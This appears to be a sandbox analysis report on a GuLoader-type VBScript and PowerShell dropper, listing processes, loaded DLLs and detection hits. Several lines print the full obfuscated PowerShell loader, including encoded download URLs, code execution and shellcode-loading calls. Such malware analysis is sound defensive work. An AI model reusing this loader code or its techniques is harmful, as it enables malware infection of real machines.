              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Spisefisk.Pur && echo t"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afrikaans='SUBsTR';$Semiprofanity26++;}$Afrikaans+='ing';Function konstruktive($Metaludlser){$Arbejdernederlaget=$Metaludlser.Length-$Semiprofanity26;For( $Outlimn=4;$Outlimn -lt $Arbejdernederlaget;$Outlimn+=5){$junking+=$Metaludlser.$Afrikaans.'Invoke'( $Outlimn, $Semiprofanity26);}$junking;}function Kreditorselskabs($Programeksempler){ . ($Ecumenicalism) ($Programeksempler);}$blyindholds=konstruktive 'AtlaMimmooDiamz eneiAabelQuitlCasuaAu,i/ res5,uma.Seas0Uroc con(CuriW eveiEmainSu idFiskoTelewS,odsPeng MedlN ,umTGale Bomb1Cone0c.ff.Adj 0Incu;pa.t Is,eWByggi.ndfnEffe6rel.4 sp,;B.tt ,uggxGome6Ency4 Unc;Fuci Unhar Appv nch: uja1Semi2Dayf1Opri.Solu0Awni)tr.l EtikGungieHeavcSmukkEnfooTors/Skjo2Tppe0Hall1 Bio0Glid0Batt1gast0Sa,g1Osmi Do FSuggiOplyr SkrePachf AndoBavixresc/ Mlk1for 2Sort1Vris.Skum0Shel ';$Begazes=konstruktive 'Pr.sUA resEc ieS unrE.tl-SvamATevagPlo eF,ern .uvtFu d ';$Ideogrammerne=konstruktive ' S,ahOvert InatUdjvpRestsByst:Fin /Fer,/Ma,taDiffdHugojNonruSew,nLytetMeloi EftaStre.MustrDi.kuMu,i.For,cGil.oToilmS ur/P.rtwNedspUnob-GonaiSnornKlimc FodlStyruspard ,coeCystsSnek/Ga giSolam IntgB,op/,utsARetspTrempBroolOmbyiO.spa Ln.nHum.c Ge eHomesBlod.MakrsPe,rmBeskiGeni>Nat,hDe itDecatBolspDeessspol:,upe/Inco/UnmoaL,esmRuddbMe ny Penv OnoespadrSnd cTraneGr.n.Bac,cforloForsm med/AuteAShempJawfpFoehl C.ri Fe,asyrln QuicAnsteA.iosBich.PennsPaabm Doli or ';$Toddyskes=konstruktive 'A,um> Tra ';$Ecumenicalism=konstruktive 'e asiK.lleDomix ilr ';$Drsprkkernes='Nonnutritiousness';$Telemestre = konstruktive 'Opsae Ovec inrhl,tco Se, Con%Om raD.umpsvvepAfstdHuipa RattHermaCel.% opn\BogbSDiskpFrili BlisOad eK.llf Sneiinv skok,kUret.PrecP ,anuHarlr erb Fejl&Ta p&Hege Ky.ieNonec VedhI.veoU,de Prot Li. ';Kreditorselskabs (konstruktive 'Inde$ContgMa clUdeloregabRoseaAmbrl Gra:.iroaKalinLetvfMemblDigiyCituvKlapnAmniiGtefnFla,gVand=Genn(TurtcBlommOctadSym, B eb/BicecAnni Un.e$NiteT Rh.eTea.lB.dre Betm O.veFortsSviptOrdlr An.eDr n)Unsl ');Kreditorselskabs (konstruktive 'Blan$Ferrg,uthlU.saoJejub,nigaC.rnlFind:ResoVS nnec,annTriqaVingl,inenNoneeCouns orfsSkif=Apos$PostI ,aadRen,eSummoBarngPilar BanaDe.emA,famFoure Skyr Syln SoaeMult. G,asBrdrpOmarlIn.oi UdbtRadi(Sten$NapkTFjero ,ysdmambdOverySacesPcflkLivieAktusAnt.)Strb ');Kreditorselskabs (konstruktive 'Frug[ iluNVejre P.utB.tr.FolkSStope MycrMarivEn,yiprfactraneArtiP O.soSammiJernnDicetNeo MAk,iaExpln benahaang Brne,sparStt,]Figu: Ene:bortSRetse ovic K,auLater .iviassetVelgysmerP BraroveroGloptVanqoUn.acBlowoSamslPetr Me,l=Fane T k[BenzNGuare .iptNonv.fienSKa eeForscProluP ftrGaloi Solt Desy osePSl.nrCarboSkurtCorooF,rsc PoloKl,alNat.TRegny racpVaadeSpin]F,ti:kine:SmkkTplanlCakesDarw1Ana,2over ');$Ideogrammerne=$Venalness[0];$Pickett= (konstruktive 'Palf$ SkogFraclCou ohospbTeraaDelilBrud:SavoKAffao Habn P.lk S.uu vakr.seurGl.ne ChanSemicJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Spisefisk.Pur && echo t"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afrikaans='SUBsTR';$Semiprofanity26++;}$Afrikaans+='ing';Function konstruktive($Metaludlser){$Arbejdernederlaget=$Metaludlser.Length-$Semiprofanity26;For( $Outlimn=4;$Outlimn -lt $Arbejdernederlaget;$Outlimn+=5){$junking+=$Metaludlser.$Afrikaans.'Invoke'( $Outlimn, $Semiprofanity26);}$junking;}function Kreditorselskabs($Programeksempler){ . ($Ecumenicalism) ($Programeksempler);}$blyindholds=konstruktive 'AtlaMimmooDiamz eneiAabelQuitlCasuaAu,i/ res5,uma.Seas0Uroc con(CuriW eveiEmainSu idFiskoTelewS,odsPeng MedlN ,umTGale Bomb1Cone0c.ff.Adj 0Incu;pa.t Is,eWByggi.ndfnEffe6rel.4 sp,;B.tt ,uggxGome6Ency4 Unc;Fuci Unhar Appv nch: uja1Semi2Dayf1Opri.Solu0Awni)tr.l EtikGungieHeavcSmukkEnfooTors/Skjo2Tppe0Hall1 Bio0Glid0Batt1gast0Sa,g1Osmi Do FSuggiOplyr SkrePachf AndoBavixresc/ Mlk1for 2Sort1Vris.Skum0Shel ';$Begazes=konstruktive 'Pr.sUA resEc ieS unrE.tl-SvamATevagPlo eF,ern .uvtFu d ';$Ideogrammerne=konstruktive ' S,ahOvert InatUdjvpRestsByst:Fin /Fer,/Ma,taDiffdHugojNonruSew,nLytetMeloi EftaStre.MustrDi.kuMu,i.For,cGil.oToilmS ur/P.rtwNedspUnob-GonaiSnornKlimc FodlStyruspard ,coeCystsSnek/Ga giSolam IntgB,op/,utsARetspTrempBroolOmbyiO.spa Ln.nHum.c Ge eHomesBlod.MakrsPe,rmBeskiGeni>Nat,hDe itDecatBolspDeessspol:,upe/Inco/UnmoaL,esmRuddbMe ny Penv OnoespadrSnd cTraneGr.n.Bac,cforloForsm med/AuteAShempJawfpFoehl C.ri Fe,asyrln QuicAnsteA.iosBich.PennsPaabm Doli or ';$Toddyskes=konstruktive 'A,um> Tra ';$Ecumenicalism=konstruktive 'e asiK.lleDomix ilr ';$Drsprkkernes='Nonnutritiousness';$Telemestre = konstruktive 'Opsae Ovec inrhl,tco Se, Con%Om raD.umpsvvepAfstdHuipa RattHermaCel.% opn\BogbSDiskpFrili BlisOad eK.llf Sneiinv skok,kUret.PrecP ,anuHarlr erb Fejl&Ta p&Hege Ky.ieNonec VedhI.veoU,de Prot Li. ';Kreditorselskabs (konstruktive 'Inde$ContgMa clUdeloregabRoseaAmbrl Gra:.iroaKalinLetvfMemblDigiyCituvKlapnAmniiGtefnFla,gVand=Genn(TurtcBlommOctadSym, B eb/BicecAnni Un.e$NiteT Rh.eTea.lB.dre Betm O.veFortsSviptOrdlr An.eDr n)Unsl ');Kreditorselskabs (konstruktive 'Blan$Ferrg,uthlU.saoJejub,nigaC.rnlFind:ResoVS nnec,annTriqaVingl,inenNoneeCouns orfsSkif=Apos$PostI ,aadRen,eSummoBarngPilar BanaDe.emA,famFoure Skyr Syln SoaeMult. G,asBrdrpOmarlIn.oi UdbtRadi(Sten$NapkTFjero ,ysdmambdOverySacesPcflkLivieAktusAnt.)Strb ');Kreditorselskabs (konstruktive 'Frug[ iluNVejre P.utB.tr.FolkSStope MycrMarivEn,yiprfactraneArtiP O.soSammiJernnDicetNeo MAk,iaExpln benahaang Brne,sparStt,]Figu: Ene:bortSRetse ovic K,auLater .iviassetVelgysmerP BraroveroGloptVanqoUn.acBlowoSamslPetr Me,l=Fane T k[BenzNGuare .iptNonv.fienSKa eeForscProluP ftrGaloi Solt Desy osePSl.nrCarboSkurtCorooF,rsc PoloKl,alNat.TRegny racpVaadeSpin]F,ti:kine:SmkkTplanlCakesDarw1Ana,2over ');$Ideogrammerne=$Venalness[0];$Pickett= (konstruktive 'Palf$ SkogFraclCou ohospbTeraaDelilBrud:SavoKAffao Habn P.lk S.uu vakr.seurGl.ne ChanSemicJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Spisefisk.Pur && echo t"Jump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: esscli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: tem.Core.pdbo source: powershell.exe, 00000007.00000002.3329236621.0000000007A2D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: em.Core.pdb source: powershell.exe, 00000007.00000002.3329236621.0000000007A2D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000007.00000002.3329236621.0000000007A2D000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              VBScript performs obfuscated calls to suspicious functions
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: ShellExecute Uncontemning,Topgrafierne,Tilskikkelsen,Axerophthol ,continuatingISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\DefaultIcon", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\ScriptEngine", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\ScriptHostEncode", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\Shell", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\Shell\Edit", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\Shell\Edit\Command", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\Shell\Open", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\Shell\Open\Command", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\Shell\Open2", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\Shell\Open2\Command", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\Shell\Print", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\Shell\Print\Command", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\ShellEx", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\ShellEx\DropHandler", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\ShellEx\PropertySheetHandlers", "Unsupported parameter type 00000000");ISWbemObjectEx._01000001("-2147483646", "SOFTWARE\Classes\VBSFile\ShellEx\PropertySheetHandlers\WSHProps", "Unsupported parameter type 00000000");IShellDispatch6.ShellExecute("POWERSHELL", ""If (${host}.CurrentUICulture) {$Afrika", "Unsupported parameter type 00000000", "Unsupported parameter type 00000000", "0")
              Yara detected GuLoader
              Source: Yara matchFile source: 00000007.00000002.3337411783.000000000C8EC000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3337285382.0000000008D80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.3322827054.00000000060CE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3408756335.00000266CF20D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Unfoldable)$global:Strmfordelere = [System.Text.Encoding]::ASCII.GetString($Opsamlingsbeholdere)$global:Undetermination=$Strmfordelere.substring($Differ,$Cameroonian)<#Efterabelsen T
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Kvistlejlighed $Sildeben $Afdryppe), (Hectical @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Forbruskede = [AppDomain]::CurrentDomain.GetAssemblies()$glo
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Lange)), $Heterostraca).DefineDynamicModule($Amianthium, $false).DefineType($Timekoder, $Nonspecific, [System.MulticastDelegate])$Chec
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Unfoldable)$global:Strmfordelere = [System.Text.Encoding]::ASCII.GetString($Opsamlingsbeholdere)$global:Undetermination=$Strmfordelere.substring($Differ,$Cameroonian)<#Efterabelsen T
              Obfuscated command line found
